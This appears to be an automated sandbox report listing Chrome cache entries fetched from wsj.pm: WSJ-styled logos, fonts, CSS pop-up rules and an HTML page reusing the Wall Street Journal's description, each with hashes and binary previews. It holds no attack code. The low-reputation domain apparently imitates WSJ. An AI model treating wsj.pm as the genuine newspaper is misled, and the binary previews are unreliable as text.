                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M37.4,3.5c0,0.8-0.2,1.5-0.7,2c-0.6,0.6-1.3,0.9-2.2,0.9c-0.9,0-1.6-0.3-2.2-0.9c-0.6-0.6-0.9-1.3-0.9-2.2 c0-0.9,0.3-1.6,0.9-2.2c0.6-0.6,1.3-0.9,2.2-0.9c0.4,0,0.8,0.1,1.2,0.3c0.4,0.2,0.7,0.4,0.9,0.7l-0.5,0.5c-0.4-0.5-0.9-0.7-1.6-0.7 c-0.6,0-1.2,0.2-1.6,0.7c-0.5,0.4-0.7,1-0.7,1.7s0.2,1.3,0.7,1.7c0.5,0.4,1,0.7,1.6,0.7c0.7,0,1.2-0.2,1.7-0.7 c0.3-0.3,0.5-0.7,0.5-1.2h-2.2V3h2.9C37.4,3.2,37.4,3.3,37.4,3.5z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M42.1,1h-2.7v1.9h2.5v0.7h-2.5v1.9h2.7v0.7h-3.5v-6h3.5V1z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M45.3,6.2h-0.8V1h-1.7V0.2H47V1h-1.7V6.2z"/><path fill="#FFFFFF" stroke

                                                                                                                Chrome Cache Entry: 142

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 220x220, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):19278
                                                                                                                Entropy (8bit):7.955056509183606
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:P1uLxSxDqCD9H7ol7hMsIJ8ma+fxyDkjSzv2GuM7yqOQEzaDlGATI:tmShqsH0li8m/59WvLuM77Ezt/
                                                                                                                MD5:1E7CBBB9A79C65F967FDC172715AB05D
                                                                                                                SHA1:B7D651316ACF3BB2B79BD668861E273C9D5D69B8
                                                                                                                SHA-256:E9334EA9DD833D3CB2DD39DC0C6D6FCF044170D7B92031820B2FF234BB3B4348
                                                                                                                SHA-512:C96B05DC36B325FF926DD222E22D8908DD03A9338C3D6E12672F2BFB0B4ED608C1EF2B0C0F02117637C28CAE28DE329DEDF4DF2D07E5A0DCFD7683322970FF67
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/AM.jpeg
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................>..........................!."1..A#2Q.Ba..$3Rq.b...CS.%r.............................................................?......................?....f..U9..l.....$...........J..7s..KR..B.=...g..t6~..e.y..v....9.s.4..QW..(..n.|...;....;w....T...`q...I.z..}....co.f....RFO]-...31!..b.#..>D.Y...M...AQ..o.'..LU.q...$.n:M.z#..;7.6LN8...........S.g...?pP.F....y..)6JHAf..|..,..}....s......7...RKjfe.#.(Z/%.v.....r..8/d.d%..zh.H.PM...WW......'FO.....f....W.....sKX.fq.'..zD.o.....:.q..R..^y.Y...........Ljc .S..t..../..k.b.....L.Eo.0..6..G.Z>%...*l.....6..[..9.....&?0.i.UI......p...=.c..4..c%=...../..0..9h.x...[N1........D.o.mZk.iA43........Dx........... 1..B.......h..$...h}..jY%.e.p[.... ..^...d.[..V...s?..a..-{U..v......s&....mI.....2.v...3.b...^.jK..........<\.:...WlF..I5.....

                                                                                                                Chrome Cache Entry: 143

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1674
                                                                                                                Entropy (8bit):4.85356911231215
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:S/ogq9pFrd7YDGJnxF68dBSfC1Cn40Rzy:S/XKFrFF6U8fSw40Rzy
                                                                                                                MD5:7684A6D7DD159866BF45008ABF42F42A
                                                                                                                SHA1:1674C5B99E92EF75D26C2EFEAD395769DCCBF68E
                                                                                                                SHA-256:8D3C87F86E88911EF10AFF9B0AD8F652883A6CDA2A1B17169983EF19DD6FB6F3
                                                                                                                SHA-512:A83CCA21292A4E9CFAB7CA4C2188352E6A4E815DED92931232F97AD28CA13F3483DF4C2986392546EA2D2F26DA48492F3603AB6B4776EDDAAA82B49DA9177D11
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/style.css
                                                                                                                Preview:.centered-link {.. position: absolute;.. display: flex;.. align-items: center;.. justify-content: center;.. font-size: 22px;.. z-index: 1111;.. width: 100%;.. height: 100%;.. font-weight: 700;.. text-align: center;.. text-transform: uppercase;..}...pop-up {.. position: fixed;.. background-color: rgba(0,0,0,0.8);.. width: 100%;.. height: 100%;.. display: flex;.. justify-content: center;.. align-items: center;.. z-index: 10000;..}...pop-up__wrapper h2 {.. font-size: 40px;.. margin-bottom: 20px;..}...pop-up__wrapper span {.. font-weight: 700;..}...pop-up__wrapper p {.. font-weight: 400;.. margin-bottom: 40px;..}...pop-up__wrapper {.. position: fixed;.. font-family: inherit;.. top: 20%;.. max-width: 700px;.. /* transform: translate(-50%, -50%); */.. background-color: #fff;.. padding: 40px 50px 40px 50px;.. font-size: 22px;.. font-weight: 700;.. /* animation: pulse 2s infinite; */..}...centered-link-

                                                                                                                Chrome Cache Entry: 144

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 220 x 220, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):50600
                                                                                                                Entropy (8bit):7.982273521260046
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:D22uLgbSATuk1CQuaS9Ow15EmS82+fk5IqImN5mPv01K:D22uLgbgksQuaNGEmHgdImNbo
                                                                                                                MD5:53786BE73B415DF9E5C3F76D49C1C1AA
                                                                                                                SHA1:CA8EB138A7539B0F597A3E69FE6589C3E84813C6
                                                                                                                SHA-256:AFF5B236949464B3D3A2C40C8352DEEFEE45C1ED2FE071AE3C47DE0C423A3F6F
                                                                                                                SHA-512:93855748EC8AFCA9B6CD6E28202F38440042D757D06B6D2233CE7BA90A9D44C528CD681E84FCD4F032F91CDE46C84893E20D4192DCF7A1CAD3F491AAE88BE65A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/AM.png
                                                                                                                Preview:.PNG........IHDR..............Z.....iCCPicc..X..WP.......<..f....$J.@rN.....A.r0!.+...HR...\pu....(.DA..,......l..{..s.un.|..O..U_wU_..6.49......$$..|.l.A.!L.= ..(@.|8;%......`u/.[...du......kQ8.........n.........>....I.....0xA.!.(g.#.q.*G}..{.|...#.DJ.W&.\.L.^ev4/.@.....I.T...^....W...&ry.\......^...'..........Fo,...D..omK9......oM..........c.]...O.i..o.....B..I..%P.m0..0.kp.W..?..M..hH..d@...(.R8..P....mp....\..p...(<........`.A..BE.$".. Z...B,.....A..0$.ID.\d.R..!.H=....E.!.a..2..!.".Q.JA..,...,..uC..h...f...^..m@O...%.&:.N./.E.`.0b...6....xbB0...f...S.i..az0......<.....c.Xm.9...ec.....j..l'..{.;.].~.Qq28-........e..p..&\...n.7.{.....jx..3>...............).".@.$h.,...pB*..PE8I.@.!L......D..#1..H.#V.[......q.$LR!..<I.R....H.!.&M..."d5....K.I.$..........(...x.......8%pM`R...F..QB)i.......7T*U.jM...R.R....O....:......5...#...HB*B6B....*.......&.......o...>+<..(B.....I.).i...2K#.Ti.4.-.v.v.6E...vt6}...~.>..3....XF..G..cA.&j(. .)Z#z^tB.#.*."./V"vZlL....

                                                                                                                Chrome Cache Entry: 145

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47552, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47552
                                                                                                                Entropy (8bit):7.995142931287489
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:JHfroyWqvnf+FZ/GyKkOdrbXaPXacB26bzuMZGMJim5Xe3KFjP5XAXSZrYWlkDPI:5royxvnQtGyKkOdLaPv26bzuoXeaFjBD
                                                                                                                MD5:87AE136546F1829642C68AA7D5BCA0D4
                                                                                                                SHA1:41A5C65092A2BA75F4021BACB3C18686545E9CB1
                                                                                                                SHA-256:27FD73DEE5596813BBD6282A821926AE6CD1281F9736D98943A1DEB6955608EE
                                                                                                                SHA-512:A124A0D656D40E9AA035774D5158F87E9E77C227E5E7BA1982253A409B28542BC3F15385223C9ED70419E0B26CE7F2D0848EE3CB7ADE4438494A7D77BFA8534E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/Retina-Medium.woff2
                                                                                                                Preview:wOF2..............2..............................:..b...H..\.`....x...........e.6.$..n..z.. ..z.....#[+...U.n/...2.t...3s>.W...8nO...{R.l|..m..[%..ef........d.ckf.f...UT.PQ.... 8Gx...r.!E.Z..N.^.j.u.......Mo[.......!...l..d..$.8.9..T.....s...N...d...a.9Y.78\....H..BgC.-.-.L...?!#Wnu....c.y.M..M..o.#a3..-.5.:.c..V#......=..1.P'4..cFX.........T......A..g.zR3.....zQ.0.....?MQ.~J......|.8..c......f.....aAS.>...i..C|.Ri...wv,..........OV...+.e..Y...y...Q....AQ....t~.:...m.I2e........p....n.._.3..N...H.A...Ks2.FM5.d/Smkm.......),c;F.WD<.%.......~...#....H...?.&.......V.$!).P.9P.......V.?.s.?.nt)...V~..=rT..D=......&Y.p. 9.E.E.6.S.w....d.......=..j....J.....!."....RP.-.....;.5.r..asjec..+..nL..u.w........9.}..oHd..E.I..)q(.EBe.C..}*....9.Gm ..}BW....'...[3.DJ..A.......B.oC..](..&./.*N9;=...t._8.b!!.....=o..6.q...(.p.....=eUE.,"....Z*.E.yfq.Z06.{8$&Xh..,D.......W.j......v.o..P.....=.E.C`=k ....:.N.1M.S.;.M......^.....R.J....K.n...ty.'m....

                                                                                                                Chrome Cache Entry: 146

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (486)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1091908
                                                                                                                Entropy (8bit):3.3259444489982144
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:g7WjwogcrU1uNjRLaXiYdNQiyebgifXX/v:g7WjwogcrU1uNVaX9eiyebgifH/v
                                                                                                                MD5:A178CDB1878275B2587AA9872D949C04
                                                                                                                SHA1:AD0765C11F1B13900287FAF52AAD76BDBCEFA38B
                                                                                                                SHA-256:04485F608B4550E0CFC442ECA69F25E32F750B001FE97336609E507719178C81
                                                                                                                SHA-512:676BA109FEB73FDC49C17E75E47FDDE81FEDF633DD5C4A68CDA13D92E4C649CE89DB299FD72C224575452F9FA4386D989DA6B6D133308EF2C6D1EDF4805FBF11
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/
                                                                                                                Preview:<!DOCTYPE html>.<html lang=en>..<head>. <meta charset="UTF-8">. <meta name="description". content="Breaking news and analysis from the U.S. and around the world at WSJ.com. Politics, Economics, Markets, Life & Arts, and in-depth reporting." />. <meta itemprop="image" content="/img/wsj-social-share.png" />. <style>. @font-face {. font-family: "Retina";. src: url("/fonts/woffs/retina/Retina-Book.woff2") format("woff2"), url("/fonts/woffs/retina/Retina-Book.woff") format("woff");. font-style: normal;. font-weight: 400;. font-display: optional;. }.. @font-face {. font-family: "Retina";. src: url("/fonts/woffs/retina/Retina-BookItalic.woff2") format("woff2"), url("/fonts/woffs/retina/Retina-BookItalic.woff") format("woff");. font-style: italic;. font-weight: 400;. font-display: optional;. }.. @font-face {. font-family:

                                                                                                                Chrome Cache Entry: 147

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6475
                                                                                                                Entropy (8bit):4.957213986967474
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:dWdNI6wvTaqU8aPqF3MqSfotMqLmnESFwUp6NIBbTv15usrdlyKMihexJRSoUgvw:dWrjIoYBSeUp6CBbTvTuk0lvkLES
                                                                                                                MD5:4699F3C28A26DE50BDE7EB2E516C4616
                                                                                                                SHA1:6792A6F7034F97C1E99468CA66751C6BC27C3838
                                                                                                                SHA-256:F173CE9ABA85239293AA2D30B59D8E9769AB57261A63376147B22773F84972BB
                                                                                                                SHA-512:F63F326AB97104B019158A3BCFAF74716366F358209431BC087D11D057896FA66A2E51490AF8843F0E2EE432D1340A700D42482E95D6E1514387DDEE61641CF8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M37.4,3.5c0,0.8-0.2,1.5-0.7,2c-0.6,0.6-1.3,0.9-2.2,0.9c-0.9,0-1.6-0.3-2.2-0.9c-0.6-0.6-0.9-1.3-0.9-2.2 c0-0.9,0.3-1.6,0.9-2.2c0.6-0.6,1.3-0.9,2.2-0.9c0.4,0,0.8,0.1,1.2,0.3c0.4,0.2,0.7,0.4,0.9,0.7l-0.5,0.5c-0.4-0.5-0.9-0.7-1.6-0.7 c-0.6,0-1.2,0.2-1.6,0.7c-0.5,0.4-0.7,1-0.7,1.7s0.2,1.3,0.7,1.7c0.5,0.4,1,0.7,1.6,0.7c0.7,0,1.2-0.2,1.7-0.7 c0.3-0.3,0.5-0.7,0.5-1.2h-2.2V3h2.9C37.4,3.2,37.4,3.3,37.4,3.5z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M42.1,1h-2.7v1.9h2.5v0.7h-2.5v1.9h2.7v0.7h-3.5v-6h3.5V1z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M45.3,6.2h-0.8V1h-1.7V0.2H47V1h-1.7V6.2z"/><path fill="#FFFFFF" stroke

                                                                                                                Chrome Cache Entry: 148

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1242
                                                                                                                Entropy (8bit):7.4848919715140045
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:Ac1spbhZ4RGxaXBsY6V4bXmLMnPUHiciVhEj0Sx6TxARdG8RG5wnq:AiWbhZ4XBsY6ubXHnPdVe4SwcrRGeq
                                                                                                                MD5:B5CA97D2473416E6EF6EDDEE47097DFB
                                                                                                                SHA1:59C7EA9475797CC44A9494C678C9435DA0082047
                                                                                                                SHA-256:F760308F9CA7561891609C963C8B8FF8C5B2F2B8CD6D188406CBF3F073AD870E
                                                                                                                SHA-512:94A64386DEE8EC33EA261C6557D9F0358B62C5D3F9C613EFD1986E806F786889B0544CC4F5631806C1077FD1C224527D492613A07B1A5E390EBCB31DD97FC517
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......>.n.."........................................7........................!.1..2AQa..q..."#BR...br.........................................................1..!Aq............?..a.sf.;b...!.........'...QeB....V;.)...A.{....N.....8..H...s...0..=.O.-..\w.mH....L&.G)R..........d.....G%....Y./!...t......R.a...../....Q..zn..,.^M%...^.....O..-....Y.....t..9.|.H..Tg..=..%...w*}.2.. ..Q.....#"....4-Y..:.*T..wa....clv..q...Y.......p........G.E..c)4j.2R..lLC....ntV.C..T...B..w]..aU76..p..(RcqF.k).=..X.;._CZ.c.O.A.c..>.W....j.lW.L{w^x.]=.^D.Zg.........Y..4-Rk.0../#JG.`p(@8~......Y....g`..!..dc..5.RG..f...b3..S^...:GC#.8...PV[.c8q....769..4...7...?....L.U...qK:l..x..x..H..QQ.Wne#.B..F.8f$....I-.......b.A6M......5...AWV.qQ$\K. ......!.#zd..*J`R&.P....w.q...ra.....*...P...Q2...S.....wK:.....P.....A.K.g. ....Q.=..x..E.vz

                                                                                                                Chrome Cache Entry: 149

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 48832, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):48832
                                                                                                                Entropy (8bit):7.995249280045157
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:kJiOFV1ZnQ1Y/jOA6bl34GCWmr+Mwfg3vUI3swNgHyNVBrh12ZP2bJwgvAE:0j1ZnQ1A6B34GCerfg3viONzh1GWJBb
                                                                                                                MD5:1E2CBA1400E0FEA01E7634DC03F91399
                                                                                                                SHA1:4098B4BA6731AEAAA11DA69057C7743D6A34EC46
                                                                                                                SHA-256:B79B2CF11707054066850EE05DE2F625D9914558836D3065C20E7F9776440FF6
                                                                                                                SHA-512:FE2D3B1C66BFED1448AA9EB0D81A9248E8262D8432858285891DC25EDD7836550327F5F97B83353B76E09EA21EE59A2EAF19976ADD11BEBF0FE3AFBD3FB8C91E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Bold.woff2
                                                                                                                Preview:wOF2..............X..............................:..b...<..\.`....x........x..;.6.$..n..z.. ..0.....#[+5.....?d....s....P...@uK.To*...{.....w...w.z............2..{.w.66..@.T.i._.i.Z..,....>&.D.>.......r..(E.T...96.6u..{..d...r..!!...Z2X..C../.C.,Q.b.5x.S.O9.............k...d..gW...I...I.e~W_T.....Q...JoU...vj}.w.d....('.dU.t... .).%|.............p..Vu.N..Q.2....I.AT.....U.ff".....I.*...(..U..L...]..*....p..B.<.......[.'....7Q".'d....O.t.7).......A_.n.5..Z.......^...q.....8L..|)....Ge......L.i.9..B....m...Bm....uBH.6.o.._D.My...k..X C..+.........$..[..j..(i.J...RM..M...>.drS.KD.-..^..b.!.......r6.K.J..Rm.a4Bgifmc..`..Sj !.H..k\+..|...S.IC...B81;...xj.f..G.A..wuV2.2+-QF(...Ji...........w.....7.rs.-7.v.z.......6......$t.*...P..K.y..Xn...X..+...H.....s{`s.*r.$....?....i.Q...qi.w...A;.n..g.P.H.M.{.|......Q~x!@......A.S.y...t......,..*.@.aY...6.u.X{.7W........"#......d.P`..0......$.2...T\...@.v........fXMt.4 ..@(q.'K.<.t..yi.G?..u.)*....A..

                                                                                                                Chrome Cache Entry: 150

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5464
                                                                                                                Entropy (8bit):4.339733741196928
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:srny/ohQlExNBJLVuJ1euHU96iDFow9z5SrsjyGDsGnY3TrmF:szuzWl50ekULDFiwjy5GnIG
                                                                                                                MD5:A6E93BA3DACA96DF368BD52A469CF262
                                                                                                                SHA1:513F40203F3EFE7FF8F5AC8528FAB98753387076
                                                                                                                SHA-256:BEEC0E606B0397CDC95EBA5C160317D7C73F18917D6CB2EC97795AEC9B10FAFA
                                                                                                                SHA-512:85B13E04D926FF53B98742306E620DBC63C0D03108D7DF8CFC40E938103C56C744CAAD121B696657DEF0533036152F9EA80BBEF42787B2553CBD44B10B9446C8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 99.5 25.1"><g><g><g><g><g><path fill="#FFFFFF" d="M14.8,11.9c0-1.7,0.9-3.3,2.4-4.2c-0.9-1.3-2.4-2.1-4-2.2c-1.7-0.2-3.3,1-4.2,1 c-0.9,0-2.2-1-3.6-1C3.5,5.7,1.8,6.7,0.9,8.3c-1.9,3.3-0.5,8.3,1.4,11c0.9,1.3,2,2.8,3.4,2.8c1.4-0.1,1.9-0.9,3.6-0.9 c1.7,0,2.1,0.9,3.6,0.9c1.5,0,2.4-1.3,3.3-2.7c0.7-0.9,1.2-2,1.5-3.1C15.9,15.5,14.8,13.8,14.8,11.9z"/><path fill="#FFFFFF" d="M12.1,3.8c0.8-1,1.2-2.2,1.1-3.5C11.9,0.4,10.8,1,10,1.9C9.2,2.9,8.7,4.1,8.8,5.3 C10.1,5.3,11.3,4.8,12.1,3.8z"/></g></g><g><path fill="#FFFFFF" d="M32.3,18.7h-4.7l-1.1,3.4h-2l4.5-12.4H31l4.5,12.4h-2L32.3,18.7z M28.1,17.2h3.8L30,11.7h-0.1L28.1,17.2z" /><path fill="#FFFFFF" d="M45.2,17.5c0,2.8-1.5,4.6-3.8,4.6c-1.2,0.1-2.3-0.6-2.8-1.6h0v4.5h-1.9V13h1.8v1.5h0c0.6-1,1.7-1.6,2.9-1.6 C43.7,12.9,45.2,14.7,45.2,17.5z M43.3,17.5c0-1.8-0.9-3-2.4-3c-1.4,0-2.4,1.2-2.4,3c0,1.8,1,3,2.4,3 C42.3,20.6,43.3,19.4,43.3,17.5z"/><path fill="#FFFFFF" d="M55.2,17.5c0,2.8-1.5,4.6-3.8,4.6c-1.2,0.1-2.3-0.

                                                                                                                Chrome Cache Entry: 151

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 287 x 192, 8-bit/color RGB, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8645
                                                                                                                Entropy (8bit):7.940666975298049
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:3V1FHxDBoeyY9tqpPwlstxTSmlMka+XcfakDUlILpu4g7wGksEb:3VlDBCY9tuwlsbTrOka+XcfakDbLqdkN
                                                                                                                MD5:2CD22B64616553DDF150713CD0503736
                                                                                                                SHA1:88B89B75DCA5547D59CEFDC41367F239C9E3A96B
                                                                                                                SHA-256:A6021562DE23D43B36EDED3A9699C3404129161A5D7CF1A4D09CA23FC1C89692
                                                                                                                SHA-512:83A757AC0AA9384037E5E1390680C92A0AA383C85428D6B7F8FA94C0FF78770CA391DF7D8448637D6B9B1190EEDCC841AEC43BE5765F0A7A847487554A284E50
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949675.png
                                                                                                                Preview:.PNG........IHDR..............*.T....pHYs...........~... .IDATx..]}l.E.....X..]@A.E'n!..it...@.....).;...P D.R..:..d.@.'gv.0.$f...U....{.;.6.^o..;^s.s..Dvf}.F....)........xf.{..T.f.5.U.......u...Q...^....b0..f..QNv..$I.eY..B+...R.<.R)..._J.P....C.._.%..HYD"..w ..{`skR.T$..n..i.,Cf%o..N..\..|>.$I........~[..|>.eO...dR......P.......,..e..: .B.a..b(`x.`.!.>T.`B;K(T"..&..i..I...t..].y.$W.%...DA.e.w.4M......{..DdY...4.....v..$I..@ .(.a..,+.........@@.e.0hCQ..K.R....(..1.D.$UUAm.9J.A..J.R.0|....M......P...e9........NP...rzo..I&.`...Aj]C>^..,.N.......a...N......v...p.........b1h.0.I...$..t.x.A..Uh=B.......G....2I....}..Hv.U...4.......S.>P.N.$..+....`...z ....Qh(..S...$...Y.$..._j.R).:.%.....*.#...K`y....^.D'WaEQ..N.Fh'6.2......-.@.vAI.#`I...\...YUU..0M..I.....S...v...t..8.#`.N.k.3.......2.....(J2...6A.A....;..:.y...3.'...T.`.C/......A..D,[n.8*..Z.08p..Bp...K.0.*L...H..8V.w..........egqF ................=M....)...VAmx#..#......#`i...v.5'(."..0R....._).

                                                                                                                Chrome Cache Entry: 152

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 66893, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):66893
                                                                                                                Entropy (8bit):7.996324109247098
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:1536:e03N9Kx0xb9cR2VdMTnL329HBid7WnoapxM8NvziTAblcR:TN9KaxZcR2VdMmHYoM89OTAZK
                                                                                                                MD5:F5141E1492B8D073C44E43CC202D6FFE
                                                                                                                SHA1:BCF7003CB8A36788BA666675F17AF3695E7615B3
                                                                                                                SHA-256:EC5AEF56172ACB4F9CC7A533D8846BD6F4C12A8BB635321299D375C3A986095D
                                                                                                                SHA-512:19898AD14997AF611585CF9FF34EEE500DC02C24E56D56A5FEBEBBEB82C7DD7DCADD2649DC7B36C6379C9F0B58943564B55F044B0D922AE3B1524DA12CF57646
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/exchange/Exchange-BookItalic.woff2
                                                                                                                Preview:wOF2.......M...........!.........................:......@..L.`..F..L........X..).6.$..>..<.. ..q..F..<[...m9...z..Bf@...l8(....v%.c..g.kx.I.f...3. s....g1{%......../^&a[I.u.f......+.....$Ue.V..!VT...aJ.n.(6..Q."Skr.*.Gw..w.M..4...[+.#u\.....xVj.^I....-Y2.$../G.._.....G"J....]lX5...oD@.D 8Q.@.@.Slw{.....p.....l.6..).D.T..............!...Y.|......0a....2Ut.J*a[..Z.k.#8....@G.t{*x3.A.......+." ."P.K......;.." ."P.....#.(..^.............#.?..Mo.|..wy..;.|.`.g.9.#...W(3.B.#H..0..M....d......K...g..x...p..T>.s.....$'...$>..g.K.>%P'.4?.w)hA=.N/...8....|G..m.#...$?......Ek^%..U.k<r..|........]....+f_....5D.6./.5...CIe.p.D.B..I.q......!...NU'y...2W..G.[.{..%..CB.B:.@.J.. .......m.....*..X+.bi<.X.~..dx.>..g...?OR..K.2E......m2.&.V5.+_f..k.bc." .bT<"...a.3o?.i$. T....:l..fdt....../_.E...."..w@jVm..Ig_..D.a...n[...@}..=.,..Ew..N+Yv@<,...C4...._....o....M..@.P"E.D....$....L..\..R......u......Cm.o~.....MS.....Y*..z...Z..$X.&......0 ..U.f.(i...... -.d...

                                                                                                                Chrome Cache Entry: 153

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47072, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47072
                                                                                                                Entropy (8bit):7.995146345063551
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:tYvczJOEZEeo+696R2eG9bxkhJ3BIEUaaqevhX0dBQgM/oM46H7wcFwdgo/7rb2/:6vc1OEWeXUovxEd/krPe46bHGdgojnt0
                                                                                                                MD5:1E6C88800C670F9EE8BF0E2EDB9B873F
                                                                                                                SHA1:7BB17E7892B82F63F217AF09E90AE1990A23C808
                                                                                                                SHA-256:51547DE25ED0756832E259E8EAC96C8B4B999C54B85F5A4CC40B2AB7E0F33043
                                                                                                                SHA-512:62336FA02DEA87AD4B86C8D643076A9B7A86C888CFFE075C9704E9EA1A3DC94564482F71E18D89BA68637DAB25C45B9172CCDF40351577D092F2CD938B1FC701
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/Retina-Light.woff2
                                                                                                                Preview:wOF2.............................................:..b...*..\.`....x........,..U.6.$..n..z.. ..n.....#[......n.Q...*.d.....tY....V~......z..l.F4.7K....?i........d..9;...].K...X.<j+Z...{L6fT)...s]!..\%...IMLh...3.r..,V.z.v.....f.w*Q)....z.k..E...*.[.4P.J.Rp......dl..C..YF....C..`hl7.9.&...x4.....M......G.V2K7...[.d..w,.3Q@Mk3.v......=.Yh.gG.t.G....S!..3.t.......J7.=:..2.2..}.....O..k.w.H-.J.x......DU..N/..o.V.?.O...U.q....X..f+....G.UL.7~g)d.f...!|,.n..n#F..\......b.#.}3WY~....5...t..C...'.r....J.<.6.sM/...]..a../.d....9`*.UT.;..7&|.H.{....^@.."v;,dsr.<.O......U....V$)bd....D.=.9..(..<.Q.4$X[... 5y..^.Su^.Z...!k..p..`...F.."... -QeP.Y.=W.]........v.[......7@.>.[...`..../{...x........J.Fh....N....&.....p...`...1.a..-..'..Yw..1....,....,S0...........&.Z..9 .I_n.t.......?...XW.-Tn.l.Up..KO....O&../<...?.e{.-.Zi..... ..`.............K...d....P...j.....o..J..m.D.2i.!cR.g...>...T...l...N...<3_....v.h;?...@B...=.t....0I..@/.....p*..c.....]hQV..P!....=

                                                                                                                Chrome Cache Entry: 154

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3217
                                                                                                                Entropy (8bit):7.863271626454483
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:O8N0J4lnCv7UjsmyllF8lhJSWJDCFN28bnNHMO+:OM0WRjsjln8lhJlJaTbnFZ+
